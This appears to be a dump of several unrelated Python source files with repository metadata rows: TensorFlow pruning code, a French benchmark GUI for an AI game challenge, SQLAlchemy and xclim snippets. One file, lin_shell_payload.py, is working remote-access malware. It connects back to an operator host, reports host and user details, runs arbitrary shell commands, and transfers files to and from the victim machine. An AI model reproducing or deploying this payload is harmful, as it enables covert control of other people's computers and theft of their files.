saver: Saver to save checkpoints. If None, a default one will be created and
used.
save_interval_secs: How often, in seconds, to save the model to `logdir`.
sync_optimizer: an instance of tf.compat.v1.train.SyncReplicasOptimizer, or
a list of them. If the argument is supplied, gradient updates will be
synchronous. If left as `None`, gradient updates will be asynchronous.
session_config: An instance of `tf.compat.v1.ConfigProto` that will be used
to configure the `Session`. If left as `None`, the default will be used.
trace_every_n_steps: produce and save a `Timeline` in Chrome trace format
and add it to the summaries every `trace_every_n_steps`. If None, no trace
information will be produced or saved.
Returns:
the value of the loss function after training.
Raises:
ValueError: if `train_op` is empty or if `startup_delay_steps` is
non-zero when `sync_optimizer` is supplied, if `number_of_steps` is
negative, or if `trace_every_n_steps` is not `None` and no `logdir` is
provided.
"""
def train_step_with_pruning_fn(sess, train_op, global_step,
train_step_kwargs):
total_loss, should_stop = train_step_fn(sess, train_op, global_step,
train_step_kwargs)
sess.run(mask_update_op)
return total_loss, should_stop
total_loss, _ = _slim.learning.train(
train_op,
logdir,
train_step_fn=train_step_with_pruning_fn,
train_step_kwargs=train_step_kwargs,
log_every_n_steps=log_every_n_steps,
graph=graph,
master=master,
is_chief=is_chief,
global_step=global_step,
number_of_steps=number_of_steps,
init_op=init_op,
init_feed_dict=init_feed_dict,
local_init_op=local_init_op,
init_fn=init_fn,
ready_op=ready_op,
summary_op=summary_op,
save_summaries_secs=save_summaries_secs,
summary_writer=summary_writer,
startup_delay_steps=startup_delay_steps,
saver=saver,
save_interval_secs=save_interval_secs,
sync_optimizer=sync_optimizer,
session_config=session_config,
trace_every_n_steps=trace_every_n_steps)
return total_loss
| 42.581633
| 81
| 0.684999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,123
| 0.733645
|
b172a5ff4bd5c2830f5d2332f4e30cc2a061bc37
| 306
|
py
|
Python
|
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
run2.py
|
akuz/deep-gen-mnist
|
13d4d350a0dc9dc7f0111c839fb7158654f048c4
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
import model
if __name__ == "__main__":
print("Making level configs...")
level_configs = model.default_level_configs()
print("Making filter variables...")
filters = model.make_filters(tf.get_default_graph(), level_configs)
print("Done")
| 19.125
| 71
| 0.70915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.22549
|
b17399bedc9351d3452e2254d35db67407d43d19
| 11,201
|
py
|
Python
|
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | 4
|
2018-09-20T13:37:28.000Z
|
2022-02-23T00:36:55.000Z
|
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | null | null | null |
payload_templates/lin_shell_payload.py
|
ahirejayeshbapu/python-shell
|
3560fe03f89557c1189255ca2737accdeda48faf
|
[
"MIT"
] | null | null | null |
import subprocess, os, socket, re, pickle, docx, urllib2
from platform import platform
from getpass import getuser
from time import sleep
from datetime import datetime
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Command Shell'
try:
operating_sys = platform()
except:
operating_sys = '?????'
try:
hostname = socket.gethostname()
except:
hostname = '?????'
try:
username = getuser()
except:
username = '?????'
userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
shell_type = '/bin/bash'
s = None
help_menu = '''\nCommand Shell Menu
==================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Command Shell Commands :
exec <shell command> Executes shell command and returns output
exec_file <shell command> Executes a shell command with no output(use this to run files and avoid blocking)
swap <shell path> Switch the type of shell used, default is "/bin/bash"
File Commands :
download <filepath> Download file
dump <filepath> Dump and view file content(supports .docx file)
upload <filepath> Upload a file
web_download <url> Download a file through a url\n'''
def basename(filepath):
basename = re.search(r'[^\\/]+(?=[\\/]?$)', filepath)
if basename:
return basename.group(0)
def recvall(tar_socket):
tar_socket.settimeout(None)
data = tar_socket.recv(9999)
if not data:
return ''
while True:
if data.endswith(End):
try:
tar_socket.settimeout(1)
more_data = tar_socket.recv(9999)
if not more_data:
return data[:-len(End)]
data += more_data
except (socket.timeout,socket.error):
tar_socket.settimeout(None)
return data[:-len(End)]
else:
more_data = tar_socket.recv(9999)
data += more_data
def shell_execute(execute):
if execute[:3] == 'cd ':
try:
execute = execute.replace('cd ', '')
os.chdir(execute)
s.sendall("[+]Changed to directory : " + execute + End)
except:
s.sendall('[-]Could not change to directory : ' + execute + End)
else:
try:
result = subprocess.Popen(execute, shell=True, executable=shell_type, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
result = result.stdout.read() + result.stderr.read()
try:
s.sendall(unicode(result + End))
except:
s.sendall(result + End)
except:
s.sendall('[-]Could not execute command' + End)
def file_execute(command):
try:
result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
s.sendall('[+]Executed : ' + command + End)
except Exception as e:
s.sendall('[-]Error executing, "' + command + '" : ' + str(e) + End)
def upload_file(file_name, content):
try:
f = open(basename(file_name), 'wb')
f.write(content)
f.close()
s.sendall('[+]Uploaded file successfully' + End)
except Exception as e:
s.sendall('[-]Error writing to file "' + file_name + '" : ' + str(e) + End)
def download_file(file_name):
if os.path.isfile(file_name):
try:
f = open(file_name, 'rb')
bin_data = f.read()
f.close()
s.sendall(file_name + '|/' + bin_data + End)
except Exception as e:
s.sendall('[-]Error reading from file "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
def dump_file(file_name):
try:
if os.path.isfile(file_name):
extension = basename(file_name).split('.')[-1] #
if extension == 'docx':
try:
doc = docx.Document(file_name)
data = '\n\n'.join([paragraph.text.encode('utf-8') for paragraph in doc.paragraphs])
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
try:
f = open(file_name, 'rb')
data = f.read()
f.close()
try:
s.sendall(unicode(data + End))
except:
try:
s.sendall(data + End)
except Exception as e:
s.sendall('[-]Error dumping file "' + basename(file_name) + '" : ' + str(e) + End)
except Exception as e:
s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
else:
s.sendall('[-]File path/name is not valid' + End)
except Exception as e:
s.sendall('[-]Error dumping file : ' + str(e) + End)
def download_from_web(url):
try:
url_data = url.split('/')[-1]
file_name = urllib2.unquote(url_data)
if file_name == '':
file_name = datetime.now().strftime("%Y%m%d-%H%M%S")
response = urllib2.urlopen(url)
data = response.read()
f = open(file_name, 'wb')
f.write(data)
f.close()
s.sendall('[+]Downloaded : ' + url + ' -> ' + file_name + End)
except Exception as e:
s.sendall('[-]Error downloading file : ' + str(e) + End)
def main():
global s, shell_type
while True:
while True:
try:
s = socket.socket()
s.connect((ip_addr, port))
break
except:
sleep(time_to_sleep)
continue
s.sendall(pickle.dumps(scout_data) + End)
while True:
try:
#s.settimeout(None)
data = recvall(s).split(' ', 1)
command = data[0]
if command == 'help':
s.sendall(help_menu + End)
elif command == 'disconnect':
s.sendall('[*]Disconnecting...' + End)
sleep(5)
break
elif command == 'terminate':
s.sendall('[*]Terminating scout...' + End)
os._exit(1)
elif command == 'sleep':
try:
sleep_time = int(data[1])
except:
s.sendall('[-]Please specify an integer as the sleep duration' + End)
continue
s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
s.shutdown(1)
s.close()
for i in range(sleep_time):
sleep(1)
break
elif command == 'exec':
try:
execute = data[1]
except:
s.sendall('[-]Specify a command to execute' + End)
continue
shell_execute(execute)
elif command == 'exec_file':
try:
execute = data[1]
except:
s.sendall('[-]Specify command/file to execute' + End)
continue
file_execute(execute)
elif command == 'swap':
try:
shell_type = data[1]
s.sendall('[+]Current shell in use is : '+shell_type+End)
except:
s.sendall('[-]Specify a shell type'+End)
elif command == 'download':
try:
file_name = data[1]
except:
s.sendall('[-]Specify file to download' + End)
continue
download_file(file_name)
elif command == 'upload':
data = data[1].split('|/', 1)
file_name = data[0]
file_contents = data[1]
upload_file(file_name, file_contents)
elif command == 'dump':
try:
file_target = data[1]
except:
s.sendall('[-]Specify file to dump contents of' + End)
continue
dump_file(file_target)
elif command == 'web_download':
try:
download_from_web(data[1])
except IndexError:
s.sendall('[-]Specify URL to download from' + End)
continue
except Exception as e:
s.sendall('[-]Error downloading from url : ' + str(e) + End)
continue
elif command == 'ping':
s.sendall('[+]Scout is alive' + End)
else:
s.sendall('[-]Unknown command "' + command + '", run "help" for help menu' + End)
except (socket.error, socket.timeout):
try:
s.shutdown(1)
s.close()
break
except socket.error:
break
except Exception as e:
try:
if command:
s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
else:
s.sendall('[-]Error message : ' + str(e) + End)
except:
s.shutdown(1)
s.close()
break
main()
| 37.713805
| 130
| 0.44871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,741
| 0.24471
|
b17454e4938df93dd6729a10260ca6df34c9564c
| 84
|
py
|
Python
|
scripts/python/make-dist-cfg.py
|
brakmic/cm3
|
b99e280eca00c322e04e0586951de50108e51343
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause",
"BSD-3-Clause"
] | 2
|
2015-03-02T17:01:32.000Z
|
2021-12-29T14:34:46.000Z
|
scripts/python/make-dist-cfg.py
|
ganeshbabuNN/cm3
|
9fb432d44a2ba89575febb38f7c1eb3dca6a3879
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause",
"BSD-3-Clause"
] | 1
|
2015-07-23T07:51:22.000Z
|
2015-07-23T07:51:22.000Z
|
scripts/python/make-dist-cfg.py
|
RodneyBates/M3Devel
|
7b8dd3fc8f5b05d1c69774d92234ea50d143a692
|
[
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | 1
|
2021-12-29T14:35:47.000Z
|
2021-12-29T14:35:47.000Z
|
#! /usr/bin/env python
from pylib import *
CopyConfigForDistribution(InstallRoot)
| 14
| 38
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.261905
|
b175213c84777ec0e61947cb929e05305bf328ad
| 17,813
|
py
|
Python
|
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
bench.py
|
citorva/verificateur_defis_leviathan
|
98cd7280253a541d94b34c120879556585ef814c
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pygame
import threading
import time
import math
import sys
import argparse
import bench_core
import multiprocessing
# Couleurs du programme. Peut être modifié à tout moment
couleur_txt = (0xc0, 0xc0, 0xc0) # Couleur gris clair pour le texte commun
couleur_vic = (0x28, 0xa7, 0x45) # Couleur verte pour la gauge et le texte associé
couleur_arp = (0x18, 0x18, 0x18) # Couleur de l'arrière plan général de l'application (Gris foncé)
couleur_gar = (0x21, 0x21, 0x21) # Couleur de l'arrière plan de la gauge en mode barre de chargement (Nuance de l'AP)
couleurs_echec = [
(0xf5, 0xe8, 0x00), # Couleur jaune pour signaler une exeption (un plantage de l'algorithme)
(0xff, 0x80, 0x3c), # Couleur orange pour signaler un puit (Le personnage prend une corniche avec un puit)
(0xf7, 0x40, 0x3b), # Couleur rouge pour signaler Léviathan (Le personnage se fait manger par ce dernier)
(0x7f, 0x7f, 0x7f), # Couleur grise pour signaler une manque d'énergie (càd le personnage tourne en rond)
(0xff, 0x00, 0x00) # Couleur rouge vif pour signaler une non réponse (L'algorithme prennds trop de temps)
]
# Modèles de texte
texte_modeles = [
"%0.00f%% à cause d'une exeption (%d, %d%% des échecs)%s",
"%0.00f%% tombé dans un puit (%d, %d%% des échecs)%s",
"%0.00f%% mangé par leviathan (%d, %d%% des échecs)%s",
"%0.00f%% par manque d'énergie (%d, %d%% des échecs)%s",
"%0.00f%% ne répondant pas (%d, %d%% des échecs)%s"
]
# Constantes de mise en page (Metriques)
metrique_mm = 8 # Marges de l'application (entre les bords de la fenêtre et le contenu ainsi que entre les éléments)
metrique_hg = 24 # Hauteur de la gauge en pixels
metrique_pt = 25 # Taille du texte de titre en points
metrique_pp = 12 # Taille du texte général en points
# Variables de benchmark (NE PAS MODIFIER)
# Variable de control de l'IHM
affichage_absolu = False
arret_demande = False
# Système de comptage du temps
heure_depart = 0
heure_fin = 0
# Initialisation de pygame (NE PAS MODIFIER)
pygame.font.init()
pygame.display.init()
# Initialisation des éléments graphiques (NE PAS MODIFIER)
ecran = None
police_titre = pygame.font.Font(pygame.font.get_default_font(), metrique_pt)
police = pygame.font.Font(pygame.font.get_default_font(), metrique_pp)
def cree_jauge(surface, donnees, couleur, rect):
"""
Dessine une gauge en fonctions des données et couleurs fournis dans une boite défini par rect.
:param surface: La surface où dessiner la gauge
:param donnees: Les données de la gauge dans un tableau de taille N
:param couleur: Les couleurs associés aux données de la gauge dans un tableau de taille N
:param rect: La boite où dessiner la gauge (coordonnées + taille)
:return: None
"""
total_donnees = 0
nombre_donnees = len(donnees)
taille_elements = [0] * nombre_donnees
largeur_donnees = 0
for i in donnees:
total_donnees += i
for i in range(nombre_donnees - 1):
t = int(rect.width * donnees[i] / total_donnees)
taille_elements[i] = t
largeur_donnees += t
taille_elements[-1] = rect.width - largeur_donnees
largeur_donnees = 0
for i in range(nombre_donnees):
surface.fill(couleur[i], (rect.x + largeur_donnees, rect.y, taille_elements[i], rect.height))
largeur_donnees += taille_elements[i]
def rendu_temps(temps):
"""
Affiche l'ordre de grandeur du temps restant
:param temps: Le temps restant en secondes
:return: Un texte donnant son ordre de grandeur en jour/heures/minutes
"""
minutes = temps // 60 % 60
heures = temps // 3600 % 24
jours = temps // 86400
if jours != 0:
return "~%d jour%s" % (jours, "s" if jours != 1 else "")
if heures != 0:
return "~%d heure%s" % (heures, "s" if heures != 1 else "")
if minutes != 0:
return "~%d minute%s" % (minutes, "s" if minutes != 1 else "")
return "<1 minute"
def format_duree(duree):
"""
Formate une durée en ensemble jours/heure/minutes/secondes
Cette durée formaté n'affiche pas les ordres de grandeurs nuls
:param duree: La durée à formater
:return: Le texte de la durée formaté sour le format <j>j <hh>h <mm>min <ss>s
"""
duree = int(math.floor(duree))
return "{}{:02d}s".format(
"{}{:02d}min".format(
"{}{:02d}h".format(
"{}j".format(duree // 86400) if duree // 86400 != 0 else "",
duree // 3600 % 24
) if duree // 3600 != 0 else "",
duree // 60 % 60
) if duree // 60 != 0 else "",
duree % 60
)
def afficher_graine(graine):
"""
Formate un texte avec la graine donnée ou ne donner rien si cette dernière est None
:param graine: La graine à afficher
:return: Un texte sous la forme ". Graine aléatoire: <graine>" si seed différent de None sinon ""
"""
if graine is None:
return ""
else:
return ". Graine aléatoire: %d" % graine
# TODO: Nettoyer et documenter cette fonction
def affichage_donnees():
# temps_restant = math.ceil(args.max_duration - temps_exec_unitaire)
duree = time.time() - heure_depart
total_tst = bench.total_compteur
temps_exec = duree * (args.number / total_tst - 1)
score = (1000 * (bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE] - 2 * bench.compteur[bench_core.PARAMETRE_ECHEC_NON_REPONSE] - bench.compteur[bench_core.PARAMETRE_ECHEC_EXEPTION] // 2) - bench.trajet_moyen) * args.web_dim / total_tst
largeur = 512
hauteur = metrique_mm
texte_compteur = police_titre.render(
"Simulation %d sur %d (%0.00f%%)" % (total_tst, args.number, 100. * float(total_tst) / float(args.number)),
True, couleur_txt)
largeur = max(largeur, texte_compteur.get_width())
hauteur += texte_compteur.get_height() + metrique_mm
texte_score = police.render("Score: %d" % score, True, couleur_txt)
largeur = max(largeur, texte_score.get_width())
hauteur += texte_score.get_height() + metrique_mm
texte_victoire = police.render(
"%0.00f%% de victoires (%d). Trajet moyen: %d" % (
100 * bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE] / total_tst, bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE], bench.trajet_moyen),
True, couleur_vic)
largeur = max(largeur, texte_victoire.get_width())
hauteur += texte_victoire.get_height() + metrique_mm
# texte_temps_annulation = None
texte_temps_restant = None
if total_tst != args.number:
texte_temps_restant = police.render(
"Temps restant: %s. Écoulé %s" % (rendu_temps(math.ceil(temps_exec)), format_duree(duree)), True,
couleur_txt)
# texte_temps_annulation = police.render("Temps restant avant annulation: %d seconde%s" % (
# temps_restant if temps_restant > 0 else 0, "s" if temps_restant > 1 else ""), True,
# couleur_txt if temps_restant > 5 else couleur_lvt)
else:
texte_temps_restant = police.render("Tests effectués en %s" % (format_duree(heure_fin - heure_depart)), True,
couleur_vic)
# texte_temps_annulation = police.render("", True, couleur_txt)
# largeur = max(largeur, texte_temps_annulation.get_width())
# hauteur += texte_temps_annulation.get_height() + metrique_mm
largeur = max(largeur, texte_temps_restant.get_width())
hauteur += texte_temps_restant.get_height() + metrique_mm
texte_echec = []
valeur_gauge = [bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE]]
couleur_gauge = [couleur_vic]
for i in range(5):
if bench.compteur[i] != 0:
texte_echec.append(
police.render(
texte_modeles[i] % (
100 * bench.compteur[i] / total_tst,
bench.compteur[i],
100 * bench.compteur[i] / bench.total_ech,
afficher_graine(bench.graines[i])
),
True, couleurs_echec[i]
)
)
valeur_gauge.append(bench.compteur[i])
couleur_gauge.append(couleurs_echec[i])
if affichage_absolu:
valeur_gauge.append(args.number - total_tst)
couleur_gauge.append(couleur_gar)
for i in texte_echec:
hauteur += i.get_height() + metrique_mm
largeur = max(largeur, i.get_width())
hauteur += metrique_hg + metrique_mm
largeur += 2 * metrique_mm
surface = pygame.Surface((largeur, hauteur))
surface.fill(couleur_arp)
y = metrique_mm
surface.blit(texte_compteur, (
largeur / 2 - texte_compteur.get_width() / 2, y, texte_compteur.get_width(), texte_compteur.get_height()))
y += texte_compteur.get_height() + metrique_mm
surface.blit(texte_score,
(largeur / 2 - texte_score.get_width() / 2, y, texte_score.get_width(), texte_score.get_height()))
y += texte_score.get_height() + metrique_mm
cree_jauge(surface, valeur_gauge, couleur_gauge,
pygame.Rect(metrique_mm, y, largeur - 2 * metrique_mm, metrique_hg))
y += metrique_hg + metrique_mm
surface.blit(texte_temps_restant, (
largeur / 2 - texte_temps_restant.get_width() / 2, y, texte_temps_restant.get_width(),
texte_temps_restant.get_height()))
y += texte_temps_restant.get_height() + metrique_mm
surface.blit(texte_victoire, (metrique_mm, y, texte_victoire.get_width(), texte_victoire.get_height()))
y += texte_victoire.get_height() + metrique_mm
for i in texte_echec:
surface.blit(i, (metrique_mm, y, i.get_width(), i.get_height()))
y += i.get_height() + metrique_mm
# surface.blit(texte_temps_annulation, (
# largeur / 2 - texte_temps_annulation.get_width() / 2, y, texte_temps_annulation.get_width(),
# texte_temps_annulation.get_height()))
return surface
def fonction_affichage():
"""
Routine d'affichage. Cette fonction tourne dans un thread indépendant
:return: None
"""
global arret_demande, affichage_absolu, ecran, heure_fin
temps_mise_a_jour = 0
duree_mise_a_jour = 1/args.update_frequency
debut_clic = False
while not arret_demande:
if time.time() - temps_mise_a_jour >= duree_mise_a_jour:
bench.mise_a_jour_donnees()
if bench.total_compteur != 0:
if bench.total_compteur < args.number:
heure_fin = time.time()
surface = affichage_donnees()
if ecran is None or surface.get_width() != ecran.get_width() or surface.get_height() != ecran.get_height():
ecran = pygame.display.set_mode((surface.get_width(), surface.get_height()))
ecran.blit(surface, (0, 0, ecran.get_width(), ecran.get_height()))
pygame.display.flip()
temps_mise_a_jour = time.time()
if ecran is not None:
for event in pygame.event.get():
if event.type == pygame.QUIT:
bench.arret()
arret_demande = True
elif event.type == pygame.MOUSEBUTTONDOWN:
debut_clic = True
elif event.type == pygame.MOUSEBUTTONUP and debut_clic:
affichage_absolu = not affichage_absolu
debut_clic = False
# Objet gérant le benchmark de l'IA
bench = None
# Parsing des options d'exécution
parser = argparse.ArgumentParser(
description="Effectue de nombreux tests dans le but de vérifier le comportement de l'IA pour le défi python "
"du Leviathan dans des cas aléatoires. Voir "
"https://tiplanet.org/forum/viewtopic.php?f=49&t=24387&p=257174#p257172 pour plus d'informations "
"sur le défi."
)
# Argument pour l'intelligence artificielle
parser.add_argument("ia", help="Fichier de l'IA à tester")
parser.add_argument('-n', "--number", default=100000, type=int, help="Nombre de tests à effectuer")
parser.add_argument('-s', "--seed", default=0xc0ffee, type=int, help="Graine aléatoire du benchmark")
parser.add_argument('-w', "--web-dim", default=36, type=int, help="Nombre de corniches")
parser.add_argument("-d", "--web-density", default=0.05, type=float,
help="Densité moyenne de voisine à chaque corniche")
parser.add_argument("-b", "--bats-density", default=0.1, type=float, help="Densité de chauve souris par parties")
parser.add_argument("-p", "--pit-density", default=0.15, type=float, help="Densité de puit par parties")
parser.add_argument("-m", "--max-duration", default=20, type=float, help="Durée maximum d'une partie en seconde")
parser.add_argument("-t", "--threads", default=1, type=int, help="Nombre de fils d'exécution pour les tests")
parser.add_argument("-f", "--update-frequency", default=24, type=int, help="Fréquence de rafraichssement de l'interface")
args = parser.parse_args(sys.argv[1:])
err = False
err_text = "\n"
if args.web_density >= 1 or args.web_density <= 0:
err_text += "La densité de corniche voisine doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.bats_density >= 1 or args.bats_density <= 0:
err_text += "La densité de chauve souris doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.pit_density >= 1 or args.pit_density <= 0:
err_text += "La densité de puit doit être comprise entre 0 et 1, non inclu\n"
err = True
if args.max_duration <= 0:
err_text += "La durée maximum d'une partie doit être strictement supérieure à 0\n"
err = True
if args.threads <= 0:
err_text += "Le nombre de fils d'exécution doit être supérieur à 0\n"
err = True
if args.web_dim <= 3:
err_text += "Un nombre raisonnable de corniche doit être fourni pour le bon fonctionnement de l'algorithme\n"
err = True
if args.number <= 0:
err_text += "Il faut au minimum un test pour pouvoir avoir des données exploitables\n"
err = True
if args.update_frequency <= 0:
err_text += "La fréquence de rafraichissement de l'interface doit être strictement positive"
err = True
if args.update_frequency > 60:
print("Alerte: La fréquence de rafraichissement choisi est très élevée. Cela pourra impacter négativement la vitesse du test")
if args.threads >= multiprocessing.cpu_count():
print("Alerte: Le nombre de fils d'exécution demandé est supérieur au nombre de processeurs disponibles. Cela risque d'impacter les performance totales de votre ordinateur")
"""
try:
bench = bench_core.Bench(
args.threads,
args.seed,
args.number,
args.ia,
args.max_duration,
args.web_dim,
args.web_density,
args.pit_density,
args.bats_density
)
except Exception as _:
err_text += "L'ia spécifié ne peut être ouvert en tant que script. Il se peut que ce dernier n'existe pas ou ne " \
"soit pas un script python valide\n"
err = True
"""
bench = bench_core.Bench(
args.threads,
args.seed,
args.number,
args.ia,
args.max_duration,
args.web_dim,
args.web_density,
args.pit_density,
args.bats_density
)
if err:
parser.print_usage()
print(err_text)
quit()
del parser
# Programme principal: Crée les fils d'exécution et fait tourner l'algorithme
fil_exec_interface_utilisateur = threading.Thread(target=fonction_affichage)
heure_depart = time.time()
fil_exec_interface_utilisateur.start()
# Lance les boucles de test
bench.demarre()
fil_exec_interface_utilisateur.join()
bench.arret()
pygame.quit()
if bench.total_compteur != 0:
total_tst = bench.total_compteur
total_vic = bench.compteur[bench_core.PARAMETRE_TOTAL_REUSSITE]
total_ech = total_tst - total_vic
total_lvt = bench.compteur[bench_core.PARAMETRE_ECHEC_LEVIATHAN]
total_pit = bench.compteur[bench_core.PARAMETRE_ECHEC_PUIT]
total_nrj = bench.compteur[bench_core.PARAMETRE_ECHEC_ENERGIE]
total_exc = bench.compteur[bench_core.PARAMETRE_ECHEC_EXEPTION]
total_nrp = bench.compteur[bench_core.PARAMETRE_ECHEC_NON_REPONSE]
graine_lvt = bench.graines[bench_core.PARAMETRE_ECHEC_LEVIATHAN]
graine_pit = bench.graines[bench_core.PARAMETRE_ECHEC_PUIT]
graine_nrj = bench.graines[bench_core.PARAMETRE_ECHEC_ENERGIE]
graine_exc = bench.graines[bench_core.PARAMETRE_ECHEC_EXEPTION]
graine_nrp = bench.graines[bench_core.PARAMETRE_ECHEC_NON_REPONSE]
score = (1000 * (total_tst - 2 * total_nrp - total_exc // 2) - bench.trajet_moyen) * args.web_dim / bench.total_compteur
print(
"Statistiques finales:\n\tNombre total test: %d\n\n"
"Score final: %d\n"
"%d succès (%0.00f%%) avec un trajet moyen de %d\n"
"%d échecs (%0.00f%%) avec comme détails:\n"
"\t%d dues à un léviathan (%0.00f%%)%s\n"
"\t%d dues à un puit (%0.00f%%)%s\n"
"\t%d dues à un manque d'énergie (%0.00f%%)%s\n"
"\t%d dues à une exeption (%0.00f%%)%s\n"
"\t%d dues à un temps de réponse trop élevé (%0.00f%%)%s\n"
"" % (
total_tst,
score,
total_vic, 100 * total_vic / bench.total_compteur, bench.trajet_moyen,
total_ech, 100 * total_ech / bench.total_compteur,
total_lvt, 100 * total_lvt / bench.total_ech, afficher_graine(graine_lvt),
total_pit, 100 * total_pit / bench.total_ech, afficher_graine(graine_pit),
total_nrj, 100 * total_nrj / bench.total_ech, afficher_graine(graine_nrj),
total_exc, 100 * total_exc / bench.total_ech, afficher_graine(graine_exc),
total_nrp, 100 * total_nrp / bench.total_ech, afficher_graine(graine_nrp)
)
)
| 41.233796
| 242
| 0.662999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,589
| 0.367485
|
b17694133578e1b1a9c1c195cbd91ca5e72b6295
| 181
|
py
|
Python
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 6
|
2019-05-10T18:31:05.000Z
|
2021-09-08T16:59:46.000Z
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 2
|
2018-06-04T23:28:16.000Z
|
2022-03-08T14:20:14.000Z
|
test/conftest.py
|
PlaidCloud/sqlalchemy-greenplum
|
b40beeee8b775290b262d3b9989e8faeba8b2d20
|
[
"BSD-3-Clause"
] | 1
|
2019-06-13T10:12:44.000Z
|
2019-06-13T10:12:44.000Z
|
from sqlalchemy.dialects import registry
registry.register("greenplum", "sqlalchemy_greenplum.dialect", "GreenplumDialect")
from sqlalchemy.testing.plugin.pytestplugin import *
| 22.625
| 82
| 0.823204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 59
| 0.325967
|
b177b1d71b976403fe1dab8da5d47925b29da724
| 10,319
|
py
|
Python
|
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | null | null | null |
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 2
|
2021-06-23T09:26:54.000Z
|
2021-07-26T19:28:41.000Z
|
xclim/core/locales.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 1
|
2021-03-02T20:12:28.000Z
|
2021-03-02T20:12:28.000Z
|
# -*- coding: utf-8 -*-
# noqa: D205,D400
"""
Internationalization
====================
Defines methods and object to help the internationalization of metadata for the
climate indicators computed by xclim.
All the methods and objects in this module use localization data given in json files.
These files are expected to be defined as in this example for french:
.. code-block::
{
"attrs_mapping" : {
"modifiers": ["", "f", "mpl", "fpl"],
"YS" : ["annuel", "annuelle", "annuels", "annuelles"],
"AS-*" : ["annuel", "annuelle", "annuels", "annuelles"],
... and so on for other frequent parameters translation...
},
"DTRVAR": {
"long_name": "Variabilité de l'amplitude de la température diurne",
"description": "Variabilité {freq:f} de l'amplitude de la température diurne (définie comme la moyenne de la variation journalière de l'amplitude de température sur une période donnée)",
"title": "Variation quotidienne absolue moyenne de l'amplitude de la température diurne",
"comment": "",
"abstract": "La valeur absolue de la moyenne de l'amplitude de la température diurne."
},
... and so on for other indicators...
}
Indicators are named by subclass identifier, the same as in the indicator registry (`xclim.core.indicators.registry`),
but which can differ from the callable name. In this case, the indicator is called through
`atmos.daily_temperature_range_variability`, but its identifier is `DTRVAR`.
Use the `ind.__class__.__name__` accessor to get its registry name.
Here, the usual parameter passed to the formatting of "description" is "freq" and is usually
translated from "YS" to "annual". However, in french and in this sentence, the feminine
form should be used, so the "f" modifier is added by the translator so that the
formatting function knows which translation to use. Acceptable entries for the mappings
are limited to what is already defined in `xclim.core.indicators.utils.default_formatter`.
For user-provided internationalization dictionaries, only the "attrs_mapping" and
its "modifiers" key are mandatory, all other entries (translations of frequent parameters
and all indicator entries) are optional. For xclim-provided translations (for now only french),
all indicators must have en entry and the "attrs_mapping" entries must match exactly the default formatter.
Those default translations are found in the `xclim/locales` folder.
Attributes
----------
TRANSLATABLE_ATTRS
List of attributes to consider translatable when generating locale dictionaries.
"""
import json
import warnings
from importlib.resources import contents, open_text
from pathlib import Path
from typing import Optional, Sequence, Tuple, Union
from .formatting import AttrFormatter, default_formatter
TRANSLATABLE_ATTRS = [
"long_name",
"description",
"comment",
"title",
"abstract",
"keywords",
